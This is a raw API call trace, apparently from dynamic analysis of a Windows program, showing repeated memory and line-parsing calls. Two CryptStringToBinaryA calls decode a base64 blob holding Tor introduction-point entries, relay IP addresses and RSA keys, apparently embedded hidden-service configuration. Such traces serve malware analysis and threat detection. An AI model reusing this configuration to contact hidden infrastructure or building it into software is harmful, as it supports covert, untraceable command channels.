memchr (_Buf=0x60d2b5, _Val=10, _MaxCount=0x7c4) returned 0x60d2f5 [0143.053] malloc (_Size=0x41) returned 0x3deff40 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d2f6, _Val=10, _MaxCount=0x783) returned 0x60d336 [0143.053] malloc (_Size=0x41) returned 0x3defcc0 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d337, _Val=10, _MaxCount=0x742) returned 0x60d377 [0143.053] malloc (_Size=0x41) returned 0x3defb80 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d378, _Val=10, _MaxCount=0x701) returned 0x60d3b8 [0143.053] malloc (_Size=0x41) returned 0x3def900 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d3b9, _Val=10, _MaxCount=0x6c0) returned 0x60d3f9 [0143.053] malloc (_Size=0x41) returned 0x3df0030 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d3fa, _Val=10, _MaxCount=0x67f) returned 0x60d43a [0143.053] malloc (_Size=0x41) returned 0x3defc70 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.053] memchr (_Buf=0x60d43b, _Val=10, _MaxCount=0x63e) returned 0x60d47b [0143.053] malloc (_Size=0x41) returned 0x3defb30 [0143.053] free (_Block=0x0) [0143.053] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d47c, _Val=10, _MaxCount=0x5fd) returned 0x60d4bc [0143.054] malloc (_Size=0x41) returned 0x3df0080 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d4bd, _Val=10, _MaxCount=0x5bc) returned 0x60d4fd [0143.054] malloc (_Size=0x41) returned 0x3def950 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d4fe, _Val=10, _MaxCount=0x57b) returned 0x60d53e [0143.054] malloc (_Size=0x41) returned 0x3defbd0 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d53f, _Val=10, _MaxCount=0x53a) returned 0x60d57f [0143.054] malloc (_Size=0x41) returned 0x3def9f0 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d580, _Val=10, _MaxCount=0x4f9) returned 0x60d5c0 [0143.054] malloc (_Size=0x41) returned 0x60eb98 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d5c1, _Val=10, _MaxCount=0x4b8) returned 0x60d601 [0143.054] malloc (_Size=0x41) returned 0x60e968 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d602, _Val=10, _MaxCount=0x477) returned 0x60d642 [0143.054] malloc (_Size=0x41) returned 0x60e878 [0143.054] free (_Block=0x0) [0143.054] free (_Block=0x0) [0143.054] memchr (_Buf=0x60d643, _Val=10, _MaxCount=0x436) returned 0x60d683 [0143.054] malloc (_Size=0x41) returned 0x60e918 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d684, _Val=10, _MaxCount=0x3f5) returned 0x60d6c4 [0143.055] malloc (_Size=0x41) returned 0x60e9b8 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d6c5, _Val=10, _MaxCount=0x3b4) returned 0x60d705 [0143.055] malloc (_Size=0x41) returned 0x60e7d8 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d706, _Val=10, _MaxCount=0x373) returned 0x60d746 [0143.055] malloc (_Size=0x41) returned 0x60eaa8 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d747, _Val=10, _MaxCount=0x332) returned 0x60d787 [0143.055] malloc (_Size=0x41) returned 0x60eaf8 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d788, _Val=10, _MaxCount=0x2f1) returned 0x60d7c8 [0143.055] malloc (_Size=0x41) returned 0x60edc8 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d7c9, _Val=10, _MaxCount=0x2b0) returned 0x60d809 [0143.055] malloc (_Size=0x41) returned 0x60ea58 [0143.055] free (_Block=0x0) [0143.055] free (_Block=0x0) [0143.055] memchr (_Buf=0x60d80a, _Val=10, _MaxCount=0x26f) returned 0x60d84a [0143.055] malloc (_Size=0x41) returned 0x60ea08 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d84b, _Val=10, _MaxCount=0x22e) returned 0x60d88b [0143.056] malloc (_Size=0x41) returned 0x60e828 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d88c, _Val=10, _MaxCount=0x1ed) returned 0x60d8cc [0143.056] malloc (_Size=0x41) returned 0x60ec88 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d8cd, _Val=10, _MaxCount=0x1ac) returned 0x60d90d [0143.056] malloc (_Size=0x41) returned 0x60eb48 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d90e, _Val=10, _MaxCount=0x16b) returned 0x60d94e [0143.056] malloc (_Size=0x41) returned 0x60ed78 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d94f, _Val=10, _MaxCount=0x12a) returned 0x60d977 [0143.056] malloc (_Size=0x29) returned 0x3624950 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d978, _Val=10, _MaxCount=0x101) returned 0x60d98d [0143.056] malloc (_Size=0x16) returned 0x3f652c0 [0143.056] free (_Block=0x0) [0143.056] free (_Block=0x0) [0143.056] memchr (_Buf=0x60d98e, _Val=10, _MaxCount=0xeb) returned 0x60d997 [0143.056] malloc (_Size=0xa) returned 0x3648cc8 [0143.056] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] memchr (_Buf=0x60d998, _Val=10, _MaxCount=0xe1) returned 0x60d9b1 [0143.057] malloc (_Size=0x1a) returned 0x3d803c8 [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] memchr (_Buf=0x60d9b2, _Val=10, _MaxCount=0xc7) returned 0x60d9f2 [0143.057] malloc (_Size=0x41) returned 0x60ebe8 [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] memchr (_Buf=0x60d9f3, _Val=10, _MaxCount=0x86) returned 0x60da33 [0143.057] malloc (_Size=0x41) returned 0x60ecd8 [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] memchr (_Buf=0x60da34, _Val=10, _MaxCount=0x45) returned 0x60da60 [0143.057] malloc (_Size=0x2d) returned 0x3624838 [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] memchr (_Buf=0x60da61, _Val=10, _MaxCount=0x18) returned 0x60da78 [0143.057] malloc (_Size=0x18) returned 0x3f65340 [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x0) [0143.057] free (_Block=0x60cdc0) [0143.057] malloc (_Size=0x41) returned 0x60ee68 [0143.057] free (_Block=0x0) [0143.057] malloc (_Size=0x81) returned 0x60c800 [0143.057] free (_Block=0x60ee68) [0143.057] malloc (_Size=0xc1) returned 0x3594d18 [0143.058] free (_Block=0x60c800) [0143.058] malloc (_Size=0x121) returned 0x3d81f20 [0143.058] free (_Block=0x3594d18) [0143.058] malloc (_Size=0x181) returned 0x3f69360 [0143.058] free (_Block=0x3d81f20) [0143.058] malloc (_Size=0x241) returned 0x3df0420 [0143.058] free (_Block=0x3f69360) [0143.058] malloc (_Size=0x361) returned 0x60cdc0 [0143.058] free (_Block=0x3df0420) [0143.058] malloc (_Size=0x4e1) returned 0x60d130 [0143.058] free (_Block=0x60cdc0) [0143.058] malloc (_Size=0x721) returned 0x3f69ce0 [0143.058] free (_Block=0x60d130) [0143.058] malloc (_Size=0xa81) returned 0x3f6a410 [0143.058] free (_Block=0x3f69ce0) [0143.058] CryptStringToBinaryA (in: pszString="aW50cm9kdWN0aW9uLXBvaW50IHBzc3R5bmd5eTRieG5pbGRyM3Qyc25maHptYnpzMjdjCmlwLWFkZHJlc3MgODAuMjExLjUzLjQ0Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQUtQeDdXK1dWekpXN1RvTGJTMnlhQzY2NEFZSmJaV0kySm9EMVlhQWxPVXlQYmdhaEhPMFNKU0sKNjJRQUdGdFdkc1RMV3cwZTl1RnhBNkJ1NHU0bHRXOW5WQVdkSXlUL2lpV3pCRjFZVVFqb3ZkMkZMbWV3dDhaZApsV2JreWpCTW9uT1J2UXBiQzJrejRWVGYzb0tNYWhnRlFMZXhJZFlBOFpYNU9Bak5WSVBaQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTd5MnFXN1k3T3Z2REJ2RFIzWGtJUzlaMTAyR3NtcnVzSEFTNjNlVkRubTVyK3ZHSVU4NjljNgpMcWVYYmI2eERncmgvQ09PMWtxdmYyVHg1M01RdDFLbk9acUMzdlM3S2U3cUJVaVo0V04wMlQ3djdubjlxMFBIClhJZmpUTS9RYWVPR3dSWkIxdmF1S0pnOTlmTDhlQVVyaUdEeWhHQTIxMExzSGNJM1pTNlRBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2ludCBmdHV3dmNxNXVhemdtdGVxNnYyazc2N200Z2ZnNWRwNAppcC1hZGRyZXNzIDg5LjE2My4xMjguMjgKb25pb24tcG9ydCA5MDAxCm9uaW9uLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBT2dYa0NMcDlobEVtazVvcUc3K0V2RGREbGRQdUxrTWZLcFBKQkhNQ1pydFBWYUxEbTJHSzJ4NQpnZEYvQWJvTWgxcURJSk5lQmo3VVVSZnFEZWYvZXY5OVhFVGJPbUUwNDNhU3BaVzAzNnlFUnQvcTVpaGc4R2tBCjY2cGFHRE1GQ2M3c0lIT3ptb3ZTVzZCQ3hqZHp6cHk4TWhRdEx1Rk5aNHZlWmlNdWpXa2RBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCnNlcnZpY2Uta2V5Ci0tLS0tQkVHSU4gUlNBIFBVQkxJQyBLRVktLS0tLQpNSUdKQW9HQkFMOXYvNzViWkh6a2tDQW5XdThrWWd4U1dmYnJmOE9tcTJEb3FFdC9zVlBhcTl0NllqWVBmWUowClRZanhpbnNhT05CSFRlWHhkNnFnYVc2ZEZaczFSMENFZDJhRlJNVHdFWDRtM3h5Q2hGd2ZkTkdjblVaS1ZNanEKY2E3RDVzSE1CYlc4R2VMR2ZBUTdiOHRyOXJrMEM5TU5hejVYY3Z0Z1hKdFNBdDl5c2pkVkFnTUJBQUU9Ci0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0KaW50cm9kdWN0aW9uLXBvaW50IHpxdzVyY2JqdDNsM3BzdDVwb2pxZ3V2YW90djZkMmlnCmlwLWFkZHJlc3MgMTk1LjE1NC4xMTIuMjI4Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU1EK1MwZ3psWUV6OGRrVzhwOHlxLy9CQmJ2cDQ2UURtT2RpNUVtcjNtY1U5TFFQSnVsaW1iRDcKTkpJMkkzZWNYT251THZqNGc2K0ZoQmR0enRXY3M4ZmFGRzdhWWhnN1FiSTJrVVYrL0dVWDUxejhDSFg0UWMwVwoxMlBoRHoxNFNYc2dET01OU2oxcXpOYlZweGlYbmcxZlpBTDNQamZybFJrVmVINVF4ZE1MQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTE1SDdEYU1SK1RneWFFNFNGZ3hNZGUwem54aWNPZ01lVzVrUEFlOFA3U3dtR0V2R1FraXdqSApKNTQrZ0FxeWdrUXBDNURNY0hIaVZ1Y1RTWXZqY254dFA4Z1hOc1I1ajNmNTBHQk9ZLzdFdlBMdmFteWh2SzJsCm5FR0xKWnVHUUlRRlAzRXNYMEgwL0syU3B3Y2htYWNxbVM4U1RIL2dRRVFTZjVXTjY4REZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=", cchString=0x9a8, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fa60, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fa60, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.058] malloc (_Size=0x73d) returned 0x60cdc0 [0143.058] free (_Block=0x0) [0143.058] CryptStringToBinaryA (in: pszString="aW50cm9kdWN0aW9uLXBvaW50IHBzc3R5bmd5eTRieG5pbGRyM3Qyc25maHptYnpzMjdjCmlwLWFkZHJlc3MgODAuMjExLjUzLjQ0Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQUtQeDdXK1dWekpXN1RvTGJTMnlhQzY2NEFZSmJaV0kySm9EMVlhQWxPVXlQYmdhaEhPMFNKU0sKNjJRQUdGdFdkc1RMV3cwZTl1RnhBNkJ1NHU0bHRXOW5WQVdkSXlUL2lpV3pCRjFZVVFqb3ZkMkZMbWV3dDhaZApsV2JreWpCTW9uT1J2UXBiQzJrejRWVGYzb0tNYWhnRlFMZXhJZFlBOFpYNU9Bak5WSVBaQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTd5MnFXN1k3T3Z2REJ2RFIzWGtJUzlaMTAyR3NtcnVzSEFTNjNlVkRubTVyK3ZHSVU4NjljNgpMcWVYYmI2eERncmgvQ09PMWtxdmYyVHg1M01RdDFLbk9acUMzdlM3S2U3cUJVaVo0V04wMlQ3djdubjlxMFBIClhJZmpUTS9RYWVPR3dSWkIxdmF1S0pnOTlmTDhlQVVyaUdEeWhHQTIxMExzSGNJM1pTNlRBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2ludCBmdHV3dmNxNXVhemdtdGVxNnYyazc2N200Z2ZnNWRwNAppcC1hZGRyZXNzIDg5LjE2My4xMjguMjgKb25pb24tcG9ydCA5MDAxCm9uaW9uLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBT2dYa0NMcDlobEVtazVvcUc3K0V2RGREbGRQdUxrTWZLcFBKQkhNQ1pydFBWYUxEbTJHSzJ4NQpnZEYvQWJvTWgxcURJSk5lQmo3VVVSZnFEZWYvZXY5OVhFVGJPbUUwNDNhU3BaVzAzNnlFUnQvcTVpaGc4R2tBCjY2cGFHRE1GQ2M3c0lIT3ptb3ZTVzZCQ3hqZHp6cHk4TWhRdEx1Rk5aNHZlWmlNdWpXa2RBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCnNlcnZpY2Uta2V5Ci0tLS0tQkVHSU4gUlNBIFBVQkxJQyBLRVktLS0tLQpNSUdKQW9HQkFMOXYvNzViWkh6a2tDQW5XdThrWWd4U1dmYnJmOE9tcTJEb3FFdC9zVlBhcTl0NllqWVBmWUowClRZanhpbnNhT05CSFRlWHhkNnFnYVc2ZEZaczFSMENFZDJhRlJNVHdFWDRtM3h5Q2hGd2ZkTkdjblVaS1ZNanEKY2E3RDVzSE1CYlc4R2VMR2ZBUTdiOHRyOXJrMEM5TU5hejVYY3Z0Z1hKdFNBdDl5c2pkVkFnTUJBQUU9Ci0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0KaW50cm9kdWN0aW9uLXBvaW50IHpxdzVyY2JqdDNsM3BzdDVwb2pxZ3V2YW90djZkMmlnCmlwLWFkZHJlc3MgMTk1LjE1NC4xMTIuMjI4Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU1EK1MwZ3psWUV6OGRrVzhwOHlxLy9CQmJ2cDQ2UURtT2RpNUVtcjNtY1U5TFFQSnVsaW1iRDcKTkpJMkkzZWNYT251THZqNGc2K0ZoQmR0enRXY3M4ZmFGRzdhWWhnN1FiSTJrVVYrL0dVWDUxejhDSFg0UWMwVwoxMlBoRHoxNFNYc2dET01OU2oxcXpOYlZweGlYbmcxZlpBTDNQamZybFJrVmVINVF4ZE1MQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTE1SDdEYU1SK1RneWFFNFNGZ3hNZGUwem54aWNPZ01lVzVrUEFlOFA3U3dtR0V2R1FraXdqSApKNTQrZ0FxeWdrUXBDNURNY0hIaVZ1Y1RTWXZqY254dFA4Z1hOc1I1ajNmNTBHQk9ZLzdFdlBMdmFteWh2SzJsCm5FR0xKWnVHUUlRRlAzRXNYMEgwL0syU3B3Y2htYWNxbVM4U1RIL2dRRVFTZjVXTjY4REZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=", cchString=0x9a8, dwFlags=0x6, pbBinary=0x60cdc0, pcbBinary=0x339fa60, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x60cdc0, pcbBinary=0x339fa60, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0143.058] malloc (_Size=0x73e) returned 0x60d508 [0143.059] free (_Block=0x0) [0143.059] malloc (_Size=0x73e) returned 0x3691270 [0143.059] free (_Block=0x0) [0143.059] malloc (_Size=0x34) returned 0x36247b0 [0143.059] free (_Block=0x0) [0143.059] malloc (_Size=0x40) returned 0x3e22080 [0143.059] free (_Block=0x0) [0143.059] free (_Block=0x0) [0143.059] memchr (_Buf=0x36912a4, _Val=10, _MaxCount=0x709) returned 0x36912bb [0143.059] malloc (_Size=0x18) returned 0x3f654c0 [0143.059] free (_Block=0x0) [0143.059] free (_Block=0x0) [0143.059] memchr (_Buf=0x36912bc, _Val=10, _MaxCount=0x6f1) returned 0x36912cb [0143.059] malloc (_Size=0x10) returned 0x3648ce0 [0143.059] free (_Block=0x0) [0143.059] free (_Block=0x0) [0143.059] memchr (_Buf=0x36912cc, _Val=10, _MaxCount=0x6e1) returned 0x36912d5 [0143.059] malloc (_Size=0xa) returned 0x3648d28 [0143.059] free (_Block=0x0) [0143.059] free (_Block=0x0) [0143.059] memchr (_Buf=0x36912d6, _Val=10, _MaxCount=0x6d7) returned 0x36912f4 [0143.059] malloc (_Size=0x1f) returned 0x3d80300 [0143.059] free (_Block=0x0) [0143.059] malloc (_Size=0x140) returned 0x3dd4790 [0143.059] free (_Block=0x3e22080) [0143.059] free (_Block=0x0) [0143.059] memchr (_Buf=0x36912f5, _Val=10, _MaxCount=0x6b8) returned 0x3691335 [0143.059] malloc (_Size=0x41) returned 0x60e8c8 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x3691336, _Val=10, _MaxCount=0x677) returned 0x3691376 [0143.060] malloc (_Size=0x41) returned 0x60ec38 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x3691377, _Val=10, _MaxCount=0x636) returned 0x36913b3 [0143.060] malloc (_Size=0x3d) returned 0x3e222c0 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x36913b4, _Val=10, _MaxCount=0x5f9) returned 0x36913d0 [0143.060] malloc (_Size=0x1d) returned 0x3d80328 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x36913d1, _Val=10, _MaxCount=0x5dc) returned 0x36913dc [0143.060] malloc (_Size=0xc) returned 0x3648ec0 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x36913dd, _Val=10, _MaxCount=0x5d0) returned 0x36913fb [0143.060] malloc (_Size=0x1f) returned 0x3d801e8 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x36913fc, _Val=10, _MaxCount=0x5b1) returned 0x369143c [0143.060] malloc (_Size=0x41) returned 0x60ed28 [0143.060] free (_Block=0x0) [0143.060] free (_Block=0x0) [0143.060] memchr (_Buf=0x369143d, _Val=10, _MaxCount=0x570) returned 0x369147d [0143.060] malloc (_Size=0x41) returned 0x60ee18 [0143.060] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x369147e, _Val=10, _MaxCount=0x52f) returned 0x36914ba [0143.061] malloc (_Size=0x3d) returned 0x3e22620 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x36914bb, _Val=10, _MaxCount=0x4f2) returned 0x36914d7 [0143.061] malloc (_Size=0x1d) returned 0x3d80120 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x36914d8, _Val=10, _MaxCount=0x4d5) returned 0x369150b [0143.061] malloc (_Size=0x34) returned 0x3624530 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x369150c, _Val=10, _MaxCount=0x4a1) returned 0x3691524 [0143.061] malloc (_Size=0x19) returned 0x3d800a8 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x3691525, _Val=10, _MaxCount=0x488) returned 0x3691534 [0143.061] malloc (_Size=0x10) returned 0x3648e00 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x3691535, _Val=10, _MaxCount=0x478) returned 0x369153e [0143.061] malloc (_Size=0xa) returned 0x3648e18 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x369153f, _Val=10, _MaxCount=0x46e) returned 0x369155d [0143.061] malloc (_Size=0x1f) returned 0x3d801c0 [0143.061] free (_Block=0x0) [0143.061] free (_Block=0x0) [0143.061] memchr (_Buf=0x369155e, _Val=10, _MaxCount=0x44f) returned 0x369159e [0143.062] malloc (_Size=0x41) returned 0x60ee68 [0143.062] free (_Block=0x0) [0143.062] malloc (_Size=0x540) returned 0x3f69ce0 [0143.062] free (_Block=0x3dd4790) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x369159f, _Val=10, _MaxCount=0x40e) returned 0x36915df [0143.062] malloc (_Size=0x41) returned 0x60e6e8 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x36915e0, _Val=10, _MaxCount=0x3cd) returned 0x369161c [0143.062] malloc (_Size=0x3d) returned 0x3e22470 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x369161d, _Val=10, _MaxCount=0x390) returned 0x3691639 [0143.062] malloc (_Size=0x1d) returned 0x3d803a0 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x369163a, _Val=10, _MaxCount=0x373) returned 0x3691645 [0143.062] malloc (_Size=0xc) returned 0x3648cf8 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x3691646, _Val=10, _MaxCount=0x367) returned 0x3691664 [0143.062] malloc (_Size=0x1f) returned 0x3d80210 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x3691665, _Val=10, _MaxCount=0x348) returned 0x36916a5 [0143.062] malloc (_Size=0x41) returned 0x60e738 [0143.062] free (_Block=0x0) [0143.062] free (_Block=0x0) [0143.062] memchr (_Buf=0x36916a6, _Val=10, _MaxCount=0x307) returned 0x36916e6 [0143.063] malloc (_Size=0x41) returned 0x60e788 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x36916e7, _Val=10, _MaxCount=0x2c6) returned 0x3691723 [0143.063] malloc (_Size=0x3d) returned 0x3e22080 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x3691724, _Val=10, _MaxCount=0x289) returned 0x3691740 [0143.063] malloc (_Size=0x1d) returned 0x3d80080 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x3691741, _Val=10, _MaxCount=0x26c) returned 0x3691774 [0143.063] malloc (_Size=0x34) returned 0x36246f0 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x3691775, _Val=10, _MaxCount=0x238) returned 0x369178f [0143.063] malloc (_Size=0x1b) returned 0x3d80238 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x3691790, _Val=10, _MaxCount=0x21d) returned 0x369179f [0143.063] malloc (_Size=0x10) returned 0x3648de8 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x36917a0, _Val=10, _MaxCount=0x20d) returned 0x36917a9 [0143.063] malloc (_Size=0xa) returned 0x3648e90 [0143.063] free (_Block=0x0) [0143.063] free (_Block=0x0) [0143.063] memchr (_Buf=0x36917aa, _Val=10, _MaxCount=0x203) returned 0x36917c8 [0143.063] malloc (_Size=0x1f) returned 0x3d800d0 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x36917c9, _Val=10, _MaxCount=0x1e4) returned 0x3691809 [0143.064] malloc (_Size=0x41) returned 0x3692938 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x369180a, _Val=10, _MaxCount=0x1a3) returned 0x369184a [0143.064] malloc (_Size=0x41) returned 0x36927f8 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x369184b, _Val=10, _MaxCount=0x162) returned 0x3691887 [0143.064] malloc (_Size=0x3d) returned 0x3e22038 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x3691888, _Val=10, _MaxCount=0x125) returned 0x36918a4 [0143.064] malloc (_Size=0x1d) returned 0x3d80148 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x36918a5, _Val=10, _MaxCount=0x108) returned 0x36918b0 [0143.064] malloc (_Size=0xc) returned 0x3648d10 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x36918b1, _Val=10, _MaxCount=0xfc) returned 0x36918cf [0143.064] malloc (_Size=0x1f) returned 0x3d80350 [0143.064] free (_Block=0x0) [0143.064] free (_Block=0x0) [0143.064] memchr (_Buf=0x36918d0, _Val=10, _MaxCount=0xdd) returned 0x3691910 [0143.064] malloc (_Size=0x41) returned 0x36927a8 [0143.064] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] memchr (_Buf=0x3691911, _Val=10, _MaxCount=0x9c) returned 0x3691951 [0143.065] malloc (_Size=0x41) returned 0x36925c8 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] memchr (_Buf=0x3691952, _Val=10, _MaxCount=0x5b) returned 0x369198e [0143.065] malloc (_Size=0x3d) returned 0x3e220c8 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] memchr (_Buf=0x369198f, _Val=10, _MaxCount=0x1e) returned 0x36919ab [0143.065] malloc (_Size=0x1d) returned 0x3d80198 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] memchr (_Buf=0x36919ac, _Val=10, _MaxCount=0x1) returned 0x36919ac [0143.065] malloc (_Size=0x1) returned 0x3f4c0c8 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x3f4c0c8) [0143.065] free (_Block=0x3691270) [0143.065] memchr (_Buf=0x36247b0, _Val=32, _MaxCount=0x33) returned 0x36247c2 [0143.065] malloc (_Size=0x13) returned 0x3f65300 [0143.065] free (_Block=0x0) [0143.065] malloc (_Size=0x40) returned 0x3e22590 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] memchr (_Buf=0x36247c3, _Val=32, _MaxCount=0x20) returned 0x0 [0143.065] malloc (_Size=0x21) returned 0x60dcd8 [0143.065] free (_Block=0x0) [0143.065] free (_Block=0x0) [0143.065] malloc (_Size=0x14) returned 0x3f65360 [0143.066] free (_Block=0x0) [0143.066] malloc (_Size=0x14) returned 0x3f65500 [0143.066] free (_Block=0x0) [0143.066] free (_Block=0x3f65500) [0143.066] free (_Block=0x3f65360) 